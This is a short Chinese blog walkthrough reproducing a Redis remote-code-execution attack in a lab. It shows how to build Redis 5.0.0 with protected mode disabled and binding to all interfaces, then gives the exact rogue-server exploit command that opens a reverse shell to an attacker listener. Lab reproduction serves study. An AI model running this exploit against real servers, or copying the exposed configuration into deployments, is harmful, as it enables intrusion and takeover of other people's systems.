漏洞复现之Redis-rce

Posted iamver

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现之Redis-rce相关的知识,希望对你有一定的参考价值。

一、环境搭建。
  1)wget http://download.redis.io/releases/redis-5.0.0.tar.gz
  tar xzf redis-5.0.0.tar.gz
  cd redis-5.0.0
  make


  2)不同机器上需更改redis.conf配置文件
  protected-mode yes 改为
  protected-mode no

  #关闭redis保护模式

  bind 127.0.0.1 改为

  bind 0.0.0.0  

  #注意:bind的意思不是绑定外部服务器的IP,而是绑定本机可以接受连接的网卡地址,默认是只能本地访问,改动后服务器上任意网卡地址可访问。 

   

  技术图片

 

  3)靶机启动服务

  cd src

  ./redis-server ../redis.conf
  #加载指定配置

二、exp准备

  https://github.com/n0b0dyCN/redis-rogue-server

  用法:python3 redis-rogue-server.py --rhost=192.168.112.132 --lhost=192.168.112.133 --exp=exp.so

三、exploit

  弹shell至本机的时候,需输入攻击机ip,输入监听端口。

  监听,成功。

    技术图片

 

以上是关于漏洞复现之Redis-rce的主要内容,如果未能解决你的问题,请参考以下文章

MS17-010(永恒之蓝)漏洞分析与复现

永恒之黑漏洞复现

永恒之蓝MS17-010漏洞复现

漏洞复现之apache解析漏洞

漏洞复现之apache解析漏洞

永恒之蓝漏洞原理及复现